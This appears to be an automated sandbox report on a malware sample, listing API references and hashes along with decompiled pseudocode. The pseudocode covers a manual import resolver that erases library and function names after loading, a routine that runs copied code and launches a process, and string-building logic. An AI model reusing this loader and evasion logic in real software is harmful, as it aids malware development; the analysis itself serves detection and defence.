                                                                                                                                                                                                                        0x026fadce
                                                                                                                                                                                                                        0x026fadce
                                                                                                                                                                                                                        0x026fadd5
                                                                                                                                                                                                                        0x026fadd7
                                                                                                                                                                                                                        0x026fade1
                                                                                                                                                                                                                        0x026fade4
                                                                                                                                                                                                                        0x026fade7
                                                                                                                                                                                                                        0x026fade7
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x026fad4d
                                                                                                                                                                                                                        0x026fad50
                                                                                                                                                                                                                        0x026fad7e
                                                                                                                                                                                                                        0x026fad88
                                                                                                                                                                                                                        0x026fad8c
                                                                                                                                                                                                                        0x026fad94
                                                                                                                                                                                                                        0x026fad97
                                                                                                                                                                                                                        0x026fad9e
                                                                                                                                                                                                                        0x026fada8
                                                                                                                                                                                                                        0x026fada8
                                                                                                                                                                                                                        0x026fadac
                                                                                                                                                                                                                        0x026fadb1
                                                                                                                                                                                                                        0x026fadc0
                                                                                                                                                                                                                        0x026fadc6
                                                                                                                                                                                                                        0x026fadc6
                                                                                                                                                                                                                        0x026fadac
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x026fad57
                                                                                                                                                                                                                        0x026fad5a
                                                                                                                                                                                                                        0x026fad62
                                                                                                                                                                                                                        0x026fad77
                                                                                                                                                                                                                        0x026fad7c
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x026fad7c
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x026fad62
                                                                                                                                                                                                                        0x026fad50
                                                                                                                                                                                                                        0x026fad4b
                                                                                                                                                                                                                        0x026fac91
                                                                                                                                                                                                                        0x026fac98
                                                                                                                                                                                                                        0x026faca8
                                                                                                                                                                                                                        0x026facb1
                                                                                                                                                                                                                        0x026facb5
                                                                                                                                                                                                                        0x026facf8
                                                                                                                                                                                                                        0x026fad04
                                                                                                                                                                                                                        0x026fad2d
                                                                                                                                                                                                                        0x026fad06
                                                                                                                                                                                                                        0x026fad0a
                                                                                                                                                                                                                        0x026fad10
                                                                                                                                                                                                                        0x026fad18
                                                                                                                                                                                                                        0x026fad1a
                                                                                                                                                                                                                        0x026fad1d
                                                                                                                                                                                                                        0x026fad23
                                                                                                                                                                                                                        0x026fad25
                                                                                                                                                                                                                        0x026fad25
                                                                                                                                                                                                                        0x026fad18
                                                                                                                                                                                                                        0x026fad0a
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x026fad04
                                                                                                                                                                                                                        0x026facbd
                                                                                                                                                                                                                        0x026facc0
                                                                                                                                                                                                                        0x026facc7
                                                                                                                                                                                                                        0x026facd7
                                                                                                                                                                                                                        0x026facda
                                                                                                                                                                                                                        0x026facea
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x026facf0
                                                                                                                                                                                                                        0x026facd1
                                                                                                                                                                                                                        0x026facd5
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x026facd5
                                                                                                                                                                                                                        0x026faca2
                                                                                                                                                                                                                        0x026faca6
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x026faca6
                                                                                                                                                                                                                        0x026fac7f
                                                                                                                                                                                                                        0x026fac83
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 026FAC2E
                                                                                                                                                                                                                        • LoadLibraryA.KERNEL32(?), ref: 026FACAB
                                                                                                                                                                                                                        • GetLastError.KERNEL32 ref: 026FACB7
                                                                                                                                                                                                                        • RaiseException.KERNEL32(C06D007E,00000000,00000001,?), ref: 026FACEA
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000001.00000002.925371401.00000000026F1000.00000020.00000001.sdmp, Offset: 026F0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000001.00000002.925367413.00000000026F0000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                        • Associated: 00000001.00000002.925384883.00000000026FC000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                        • Associated: 00000001.00000002.925389502.00000000026FD000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                        • Associated: 00000001.00000002.925395826.00000000026FF000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: ExceptionRaise$ErrorLastLibraryLoad
                                                                                                                                                                                                                        • String ID: $
                                                                                                                                                                                                                        • API String ID: 948315288-3993045852
                                                                                                                                                                                                                        • Opcode ID: 3506c88cae0c99823c8071f2fbb432f45a1e7a923ba3306ac282dad60770df17
                                                                                                                                                                                                                        • Instruction ID: 520e19cc2e8262909338392b6f57628c21903dbb52660bc43c3d8d439bced5d0
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3506c88cae0c99823c8071f2fbb432f45a1e7a923ba3306ac282dad60770df17
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 53812A75A40609AFDF94CFE8D984BADB7F5AF48315F108429EA09D7380EB70E945CB50
                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                        C-Code - Quality: 56%
                                                                                                                                                                                                                        			E026F4118(void* __ecx, intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, intOrPtr* _a16, intOrPtr* _a20) {
                                                                                                                                                                                                                        				intOrPtr _v8;
                                                                                                                                                                                                                        				intOrPtr _v12;
                                                                                                                                                                                                                        				char _v16;
                                                                                                                                                                                                                        				signed int _v20;
                                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                                        				intOrPtr _t42;
                                                                                                                                                                                                                        				intOrPtr _t44;
                                                                                                                                                                                                                        				void* _t46;
                                                                                                                                                                                                                        				void* _t47;
                                                                                                                                                                                                                        				void* _t48;
                                                                                                                                                                                                                        				int _t49;
                                                                                                                                                                                                                        				intOrPtr _t53;
                                                                                                                                                                                                                        				WCHAR* _t56;
                                                                                                                                                                                                                        				void* _t57;
                                                                                                                                                                                                                        				int _t58;
                                                                                                                                                                                                                        				intOrPtr _t64;
                                                                                                                                                                                                                        				void* _t69;
                                                                                                                                                                                                                        				intOrPtr* _t73;
                                                                                                                                                                                                                        				void* _t74;
                                                                                                                                                                                                                        				intOrPtr _t75;
                                                                                                                                                                                                                        				intOrPtr _t79;
                                                                                                                                                                                                                        				intOrPtr* _t85;
                                                                                                                                                                                                                        				intOrPtr _t88;
                                                                                                                                                                                                                        
                                                                                                                                                                                                                        				_t74 = __ecx;
                                                                                                                                                                                                                        				_t79 =  *0x26fd33c; // 0x4b39bb8
                                                                                                                                                                                                                        				_v20 = 8;
                                                                                                                                                                                                                        				_v16 = GetTickCount();
                                                                                                                                                                                                                        				_t42 = E026F222E(_t74,  &_v16);
                                                                                                                                                                                                                        				_v12 = _t42;
                                                                                                                                                                                                                        				if(_t42 == 0) {
                                                                                                                                                                                                                        					_v12 = 0x26fc19c;
                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                        				_t44 = E026F5E8C(_t79);
                                                                                                                                                                                                                        				_v8 = _t44;
                                                                                                                                                                                                                        				if(_t44 != 0) {
                                                                                                                                                                                                                        					_t85 = __imp__;
                                                                                                                                                                                                                        					_t46 =  *_t85(_v12, _t69);
                                                                                                                                                                                                                        					_t47 =  *_t85(_v8);
                                                                                                                                                                                                                        					_t48 =  *_t85(_a4);
                                                                                                                                                                                                                        					_t49 = lstrlenW(_a8);
                                                                                                                                                                                                                        					_t53 = E026F6D10(lstrlenW(0x26feb08) + _t48 + _t46 + _t46 + _t47 + _t49 + lstrlenW(0x26feb08) + _t48 + _t46 + _t46 + _t47 + _t49 + 2);
                                                                                                                                                                                                                        					_v16 = _t53;
                                                                                                                                                                                                                        					if(_t53 != 0) {
                                                                                                                                                                                                                        						_t75 =  *0x26fd2a4; // 0x243a5a8
                                                                                                                                                                                                                        						_t73 =  *0x26fd11c; // 0x26fa9d7
                                                                                                                                                                                                                        						_t18 = _t75 + 0x26feb08; // 0x530025
                                                                                                                                                                                                                        						 *_t73(_t53, _t18, _v12, _v12, _a4, _v8, _a8);
                                                                                                                                                                                                                        						_t56 =  *_t85(_v8);
                                                                                                                                                                                                                        						_a8 = _t56;
                                                                                                                                                                                                                        						_t57 =  *_t85(_a4);
                                                                                                                                                                                                                        						_t58 = lstrlenW(_a12);
                                                                                                                                                                                                                        						_t88 = E026F6D10(lstrlenW(0x26fec28) + _a8 + _t57 + _t58 + lstrlenW(0x26fec28) + _a8 + _t57 + _t58 + 2);
                                                                                                                                                                                                                        						if(_t88 == 0) {
                                                                                                                                                                                                                        							E026F45B3(_v16);
                                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                                        							_t64 =  *0x26fd2a4; // 0x243a5a8
                                                                                                                                                                                                                        							_t31 = _t64 + 0x26fec28; // 0x73006d
                                                                                                                                                                                                                        							 *_t73(_t88, _t31, _a4, _v8, _a12);
                                                                                                                                                                                                                        							 *_a16 = _v16;
                                                                                                                                                                                                                        							_v20 = _v20 & 0x00000000;
                                                                                                                                                                                                                        							 *_a20 = _t88;
                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                        					E026F45B3(_v8);
                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                        				return _v20;
                                                                                                                                                                                                                        			}


























                                                                                                                                                                                                                        0x026f4118
                                                                                                                                                                                                                        0x026f4120
                                                                                                                                                                                                                        0x026f4126
                                                                                                                                                                                                                        0x026f4136
                                                                                                                                                                                                                        0x026f4139
                                                                                                                                                                                                                        0x026f413e
                                                                                                                                                                                                                        0x026f4143
                                                                                                                                                                                                                        0x026f4145
                                                                                                                                                                                                                        0x026f4145
                                                                                                                                                                                                                        0x026f414e
                                                                                                                                                                                                                        0x026f4153
                                                                                                                                                                                                                        0x026f4158
                                                                                                                                                                                                                        0x026f415e
                                                                                                                                                                                                                        0x026f4168
                                                                                                                                                                                                                        0x026f4171
                                                                                                                                                                                                                        0x026f4178
                                                                                                                                                                                                                        0x026f4186
                                                                                                                                                                                                                        0x026f4198
                                                                                                                                                                                                                        0x026f419d
                                                                                                                                                                                                                        0x026f41a2
                                                                                                                                                                                                                        0x026f41ab
                                                                                                                                                                                                                        0x026f41b4
                                                                                                                                                                                                                        0x026f41bd
                                                                                                                                                                                                                        0x026f41cb
                                                                                                                                                                                                                        0x026f41d3
                                                                                                                                                                                                                        0x026f41d8
                                                                                                                                                                                                                        0x026f41db
                                                                                                                                                                                                                        0x026f41e6
                                                                                                                                                                                                                        0x026f41fd
                                                                                                                                                                                                                        0x026f4201
                                                                                                                                                                                                                        0x026f4234
                                                                                                                                                                                                                        0x026f4203
                                                                                                                                                                                                                        0x026f4206
                                                                                                                                                                                                                        0x026f420e
                                                                                                                                                                                                                        0x026f4219
                                                                                                                                                                                                                        0x026f4221
                                                                                                                                                                                                                        0x026f4229
                                                                                                                                                                                                                        0x026f422d
                                                                                                                                                                                                                        0x026f422d
                                                                                                                                                                                                                        0x026f4201
                                                                                                                                                                                                                        0x026f423c
                                                                                                                                                                                                                        0x026f4241
                                                                                                                                                                                                                        0x026f4248

                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • GetTickCount.KERNEL32 ref: 026F412D
                                                                                                                                                                                                                        • lstrlen.KERNEL32(00000000,80000002), ref: 026F4168
                                                                                                                                                                                                                        • lstrlen.KERNEL32(?), ref: 026F4171
                                                                                                                                                                                                                        • lstrlen.KERNEL32(00000000), ref: 026F4178
                                                                                                                                                                                                                        • lstrlenW.KERNEL32(80000002), ref: 026F4186
                                                                                                                                                                                                                        • lstrlenW.KERNEL32(026FEB08), ref: 026F418F
                                                                                                                                                                                                                        • lstrlen.KERNEL32(?), ref: 026F41D3
                                                                                                                                                                                                                        • lstrlen.KERNEL32(?), ref: 026F41DB
                                                                                                                                                                                                                        • lstrlenW.KERNEL32(?), ref: 026F41E6
                                                                                                                                                                                                                        • lstrlenW.KERNEL32(026FEC28), ref: 026F41EF
                                                                                                                                                                                                                          • Part of subcall function 026F45B3: HeapFree.KERNEL32(00000000,00000000,026F5DE9,00000000,?,?,-00000008), ref: 026F45BF
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000001.00000002.925371401.00000000026F1000.00000020.00000001.sdmp, Offset: 026F0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000001.00000002.925367413.00000000026F0000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                        • Associated: 00000001.00000002.925384883.00000000026FC000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                        • Associated: 00000001.00000002.925389502.00000000026FD000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                        • Associated: 00000001.00000002.925395826.00000000026FF000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: lstrlen$CountFreeHeapTick
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 2535036572-0
                                                                                                                                                                                                                        • Opcode ID: 95571ee48c0f5cb442481b3e24b546bbd64aa0fb8dc8ce1be7fa31ab49a2a48c
                                                                                                                                                                                                                        • Instruction ID: e85d55c6e2892478e076e3975a1f33f71c9df892eff336e38a864d7b55112bb4
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 95571ee48c0f5cb442481b3e24b546bbd64aa0fb8dc8ce1be7fa31ab49a2a48c
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 30314976D00209AFCF41AFA4CC8499E7FB5FF48354B054465EA14A7220DB36EA21DF90
                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                                        			E02191D05(intOrPtr* _a4, intOrPtr _a8) {
                                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                                        				signed short _v12;
                                                                                                                                                                                                                        				struct HINSTANCE__* _v16;
                                                                                                                                                                                                                        				intOrPtr _v20;
                                                                                                                                                                                                                        				_Unknown_base(*)()* _v24;
                                                                                                                                                                                                                        				intOrPtr _t34;
                                                                                                                                                                                                                        				intOrPtr _t36;
                                                                                                                                                                                                                        				struct HINSTANCE__* _t37;
                                                                                                                                                                                                                        				intOrPtr _t40;
                                                                                                                                                                                                                        				CHAR* _t44;
                                                                                                                                                                                                                        				_Unknown_base(*)()* _t45;
                                                                                                                                                                                                                        				intOrPtr* _t52;
                                                                                                                                                                                                                        				intOrPtr _t53;
                                                                                                                                                                                                                        				signed short _t54;
                                                                                                                                                                                                                        				intOrPtr* _t57;
                                                                                                                                                                                                                        				signed short _t59;
                                                                                                                                                                                                                        				CHAR* _t60;
                                                                                                                                                                                                                        				CHAR* _t62;
                                                                                                                                                                                                                        				signed short* _t64;
                                                                                                                                                                                                                        				void* _t65;
                                                                                                                                                                                                                        				signed short _t72;
                                                                                                                                                                                                                        
                                                                                                                                                                                                                        				_t34 =  *((intOrPtr*)(_a8 + 0x80));
                                                                                                                                                                                                                        				_v8 = _v8 & 0x00000000;
                                                                                                                                                                                                                        				_t52 = _a4;
                                                                                                                                                                                                                        				if(_t34 == 0) {
                                                                                                                                                                                                                        					L28:
                                                                                                                                                                                                                        					return _v8;
                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                        				_t57 = _t34 + _t52;
                                                                                                                                                                                                                        				_t36 =  *((intOrPtr*)(_t57 + 0xc));
                                                                                                                                                                                                                        				_a4 = _t57;
                                                                                                                                                                                                                        				if(_t36 == 0) {
                                                                                                                                                                                                                        					L27:
                                                                                                                                                                                                                        					goto L28;
                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                        				while(1) {
                                                                                                                                                                                                                        					_t62 = _t36 + _t52;
                                                                                                                                                                                                                        					_t37 = LoadLibraryA(_t62);
                                                                                                                                                                                                                        					_v16 = _t37;
                                                                                                                                                                                                                        					if(_t37 == 0) {
                                                                                                                                                                                                                        						break;
                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                        					_v12 = _v12 & 0x00000000;
                                                                                                                                                                                                                        					memset(_t62, 0, lstrlenA(_t62));
                                                                                                                                                                                                                        					_t53 =  *_t57;
                                                                                                                                                                                                                        					_t40 =  *((intOrPtr*)(_t57 + 0x10));
                                                                                                                                                                                                                        					_t65 = _t65 + 0xc;
                                                                                                                                                                                                                        					if(_t53 != 0) {
                                                                                                                                                                                                                        						L6:
                                                                                                                                                                                                                        						_t64 = _t53 + _t52;
                                                                                                                                                                                                                        						_t54 =  *_t64;
                                                                                                                                                                                                                        						if(_t54 == 0) {
                                                                                                                                                                                                                        							L23:
                                                                                                                                                                                                                        							_t36 =  *((intOrPtr*)(_t57 + 0x20));
                                                                                                                                                                                                                        							_t57 = _t57 + 0x14;
                                                                                                                                                                                                                        							_a4 = _t57;
                                                                                                                                                                                                                        							if(_t36 != 0) {
                                                                                                                                                                                                                        								continue;
                                                                                                                                                                                                                        							}
                                                                                                                                                                                                                        							L26:
                                                                                                                                                                                                                        							goto L27;
                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                        						_v20 = _t40 - _t64 + _t52;
                                                                                                                                                                                                                        						_t72 = _t54;
                                                                                                                                                                                                                        						L8:
                                                                                                                                                                                                                        						L8:
                                                                                                                                                                                                                        						if(_t72 < 0) {
                                                                                                                                                                                                                        							if(_t54 < _t52 || _t54 >=  *((intOrPtr*)(_a8 + 0x50)) + _t52) {
                                                                                                                                                                                                                        								_t59 = 0;
                                                                                                                                                                                                                        								_v12 =  *_t64 & 0x0000ffff;
                                                                                                                                                                                                                        							} else {
                                                                                                                                                                                                                        								_t59 = _t54;
                                                                                                                                                                                                                        							}
                                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                                        							_t59 = _t54 + _t52;
                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                        						_t20 = _t59 + 2; // 0x2
                                                                                                                                                                                                                        						_t44 = _t20;
                                                                                                                                                                                                                        						if(_t59 == 0) {
                                                                                                                                                                                                                        							_t44 = _v12 & 0x0000ffff;
                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                        						_t45 = GetProcAddress(_v16, _t44);
                                                                                                                                                                                                                        						_v24 = _t45;
                                                                                                                                                                                                                        						if(_t45 == 0) {
                                                                                                                                                                                                                        							goto L21;
                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                        						if(_t59 != 0) {
                                                                                                                                                                                                                        							_t60 = _t59 + 2;
                                                                                                                                                                                                                        							memset(_t60, 0, lstrlenA(_t60));
                                                                                                                                                                                                                        							_t65 = _t65 + 0xc;
                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                        						 *(_v20 + _t64) = _v24;
                                                                                                                                                                                                                        						_t64 =  &(_t64[2]);
                                                                                                                                                                                                                        						_t54 =  *_t64;
                                                                                                                                                                                                                        						if(_t54 != 0) {
                                                                                                                                                                                                                        							goto L8;
                                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                                        							L22:
                                                                                                                                                                                                                        							_t57 = _a4;
                                                                                                                                                                                                                        							goto L23;
                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                        						L21:
                                                                                                                                                                                                                        						_v8 = 0x7f;
                                                                                                                                                                                                                        						goto L22;
                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                        					_t53 = _t40;
                                                                                                                                                                                                                        					if(_t40 == 0) {
                                                                                                                                                                                                                        						goto L23;
                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                        					goto L6;
                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                        				_v8 = 0x7e;
                                                                                                                                                                                                                        				goto L26;
                                                                                                                                                                                                                        			}
























                                                                                                                                                                                                                        0x02191d0e
                                                                                                                                                                                                                        0x02191d14
                                                                                                                                                                                                                        0x02191d19
                                                                                                                                                                                                                        0x02191d1e
                                                                                                                                                                                                                        0x02191e1f
                                                                                                                                                                                                                        0x02191e24
                                                                                                                                                                                                                        0x02191e24
                                                                                                                                                                                                                        0x02191d25
                                                                                                                                                                                                                        0x02191d28
                                                                                                                                                                                                                        0x02191d2b
                                                                                                                                                                                                                        0x02191d30
                                                                                                                                                                                                                        0x02191e1e
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x02191e1e
                                                                                                                                                                                                                        0x02191d37
                                                                                                                                                                                                                        0x02191d37
                                                                                                                                                                                                                        0x02191d3b
                                                                                                                                                                                                                        0x02191d41
                                                                                                                                                                                                                        0x02191d46
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x02191d4c
                                                                                                                                                                                                                        0x02191d5b
                                                                                                                                                                                                                        0x02191d60
                                                                                                                                                                                                                        0x02191d62
                                                                                                                                                                                                                        0x02191d65
                                                                                                                                                                                                                        0x02191d6a
                                                                                                                                                                                                                        0x02191d76
                                                                                                                                                                                                                        0x02191d76
                                                                                                                                                                                                                        0x02191d79
                                                                                                                                                                                                                        0x02191d7d
                                                                                                                                                                                                                        0x02191e03
                                                                                                                                                                                                                        0x02191e03
                                                                                                                                                                                                                        0x02191e06
                                                                                                                                                                                                                        0x02191e09
                                                                                                                                                                                                                        0x02191e0e
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x02191e1d
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x02191e1d
                                                                                                                                                                                                                        0x02191d87
                                                                                                                                                                                                                        0x02191d8a
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x02191d8c
                                                                                                                                                                                                                        0x02191d8c
                                                                                                                                                                                                                        0x02191d95
                                                                                                                                                                                                                        0x02191daa
                                                                                                                                                                                                                        0x02191dac
                                                                                                                                                                                                                        0x02191da3
                                                                                                                                                                                                                        0x02191da3
                                                                                                                                                                                                                        0x02191da3
                                                                                                                                                                                                                        0x02191d8e
                                                                                                                                                                                                                        0x02191d8e
                                                                                                                                                                                                                        0x02191d8e
                                                                                                                                                                                                                        0x02191daf
                                                                                                                                                                                                                        0x02191daf
                                                                                                                                                                                                                        0x02191db4
                                                                                                                                                                                                                        0x02191db6
                                                                                                                                                                                                                        0x02191db6
                                                                                                                                                                                                                        0x02191dbe
                                                                                                                                                                                                                        0x02191dc4
                                                                                                                                                                                                                        0x02191dc9
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x02191dcd
                                                                                                                                                                                                                        0x02191dcf
                                                                                                                                                                                                                        0x02191ddd
                                                                                                                                                                                                                        0x02191de2
                                                                                                                                                                                                                        0x02191de2
                                                                                                                                                                                                                        0x02191deb
                                                                                                                                                                                                                        0x02191dee
                                                                                                                                                                                                                        0x02191df1
                                                                                                                                                                                                                        0x02191df5
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x02191df7
                                                                                                                                                                                                                        0x02191e00
                                                                                                                                                                                                                        0x02191e00
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x02191e00
                                                                                                                                                                                                                        0x02191df9
                                                                                                                                                                                                                        0x02191df9
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x02191df9
                                                                                                                                                                                                                        0x02191d6c
                                                                                                                                                                                                                        0x02191d70
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x02191d70
                                                                                                                                                                                                                        0x02191e16
                                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • LoadLibraryA.KERNEL32(?,?,?,00000000,?,?,?,00000002), ref: 02191D3B
                                                                                                                                                                                                                        • lstrlenA.KERNEL32(?), ref: 02191D51
                                                                                                                                                                                                                        • memset.NTDLL ref: 02191D5B
                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(?,00000002), ref: 02191DBE
                                                                                                                                                                                                                        • lstrlenA.KERNEL32(-00000002), ref: 02191DD3
                                                                                                                                                                                                                        • memset.NTDLL ref: 02191DDD
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000001.00000002.925081715.0000000002190000.00000040.00020000.sdmp, Offset: 02190000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000001.00000002.925087488.0000000002195000.00000040.00020000.sdmp Download File
                                                                                                                                                                                                                        • Associated: 00000001.00000002.925092020.0000000002197000.00000040.00020000.sdmp Download File
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: lstrlenmemset$AddressLibraryLoadProc
                                                                                                                                                                                                                        • String ID: ~
                                                                                                                                                                                                                        • API String ID: 1986585659-1707062198
                                                                                                                                                                                                                        • Opcode ID: e7511829f2a6422bd3695c2a4bcc9303ec7df9d1bd697d5016612e427727b76b
                                                                                                                                                                                                                        • Instruction ID: e155068072337ed4d8f52edf07fee7992282d2e07ca001bc7ce68c205e48013b
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e7511829f2a6422bd3695c2a4bcc9303ec7df9d1bd697d5016612e427727b76b
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A7318C76A41207BFDF15CF58C884BAEB7F9BF44245F214069E819EB240E771EA85CB90
                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                        C-Code - Quality: 73%
                                                                                                                                                                                                                        			E026F49B7(void* __eax, void* __ecx) {
                                                                                                                                                                                                                        				long _v8;
                                                                                                                                                                                                                        				void* _v12;
                                                                                                                                                                                                                        				void* _v16;
                                                                                                                                                                                                                        				void* _v28;
                                                                                                                                                                                                                        				long _v32;
                                                                                                                                                                                                                        				void _v104;
                                                                                                                                                                                                                        				char _v108;
                                                                                                                                                                                                                        				long _t36;
                                                                                                                                                                                                                        				intOrPtr _t39;
                                                                                                                                                                                                                        				intOrPtr _t46;
                                                                                                                                                                                                                        				intOrPtr _t49;
                                                                                                                                                                                                                        				void* _t57;
                                                                                                                                                                                                                        				void* _t66;
                                                                                                                                                                                                                        				intOrPtr _t67;
                                                                                                                                                                                                                        				intOrPtr* _t68;
                                                                                                                                                                                                                        				intOrPtr* _t69;
                                                                                                                                                                                                                        
                                                                                                                                                                                                                        				_t1 = __eax + 0x14; // 0x74183966
                                                                                                                                                                                                                        				_t67 =  *_t1;
                                                                                                                                                                                                                        				_t36 = E026F14E7(__ecx,  *(_t67 + 0xc),  &_v12,  &_v16);
                                                                                                                                                                                                                        				_v8 = _t36;
                                                                                                                                                                                                                        				if(_t36 != 0) {
                                                                                                                                                                                                                        					L12:
                                                                                                                                                                                                                        					return _v8;
                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                        				memcpy(_v12,  *(_t67 + 8),  *(_t67 + 0xc));
                                                                                                                                                                                                                        				_t39 = _v12(_v12);
                                                                                                                                                                                                                        				_v8 = _t39;
                                                                                                                                                                                                                        				if(_t39 == 0 && ( *0x26fd260 & 0x00000001) != 0) {
                                                                                                                                                                                                                        					_v32 = 0;
                                                                                                                                                                                                                        					asm("stosd");
                                                                                                                                                                                                                        					asm("stosd");
                                                                                                                                                                                                                        					asm("stosd");
                                                                                                                                                                                                                        					_v108 = 0;
                                                                                                                                                                                                                        					memset( &_v104, 0, 0x40);
                                                                                                                                                                                                                        					_t46 =  *0x26fd2a4; // 0x243a5a8
                                                                                                                                                                                                                        					_t18 = _t46 + 0x26fe3e6; // 0x73797325
                                                                                                                                                                                                                        					_t66 = E026F67CF(_t18);
                                                                                                                                                                                                                        					if(_t66 == 0) {
                                                                                                                                                                                                                        						_v8 = 8;
                                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                                        						_t49 =  *0x26fd2a4; // 0x243a5a8
                                                                                                                                                                                                                        						_t19 = _t49 + 0x26fe747; // 0x4b38cef
                                                                                                                                                                                                                        						_t20 = _t49 + 0x26fe0af; // 0x4e52454b
                                                                                                                                                                                                                        						_t69 = GetProcAddress(GetModuleHandleA(_t20), _t19);
                                                                                                                                                                                                                        						if(_t69 == 0) {
                                                                                                                                                                                                                        							_v8 = 0x7f;
                                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                                        							_v108 = 0x44;
                                                                                                                                                                                                                        							E026F3D1E();
                                                                                                                                                                                                                        							_t57 =  *_t69(0, _t66, 0, 0, 0, 0x4000000, 0, 0,  &_v108,  &_v32, 0);
                                                                                                                                                                                                                        							_push(1);
                                                                                                                                                                                                                        							E026F3D1E();
                                                                                                                                                                                                                        							if(_t57 == 0) {
                                                                                                                                                                                                                        								_v8 = GetLastError();
                                                                                                                                                                                                                        							} else {
                                                                                                                                                                                                                        								CloseHandle(_v28);
                                                                                                                                                                                                                        								CloseHandle(_v32);
                                                                                                                                                                                                                        							}
                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                        						HeapFree( *0x26fd238, 0, _t66);
                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                        				_t68 = _v16;
                                                                                                                                                                                                                        				 *((intOrPtr*)(_t68 + 0x18))( *((intOrPtr*)(_t68 + 0x1c))( *_t68));
                                                                                                                                                                                                                        				E026F45B3(_t68);
                                                                                                                                                                                                                        				goto L12;
                                                                                                                                                                                                                        			}



















                                                                                                                                                                                                                        0x026f49bf
                                                                                                                                                                                                                        0x026f49bf
                                                                                                                                                                                                                        0x026f49ce
                                                                                                                                                                                                                        0x026f49d5
